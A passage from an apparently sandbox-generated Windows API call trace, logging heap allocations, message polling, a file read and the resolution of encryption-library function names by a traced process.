wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0029.752] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0029.753] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.753] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x64b5, lpOverlapped=0x0) returned 1 [0029.754] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64b5) returned 0x8affc0 [0029.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0029.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0029.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64b5) returned 0x8b6480 [0029.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.755] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64b5) returned 0x8affc0 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.756] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64b5) returned 0x8affc0 [0029.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0029.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0029.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64b5) returned 0x8bc940 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0029.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0029.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0029.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.759] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3f8 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.759] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.759] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0029.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.760] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0029.761] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0029.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.762] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, 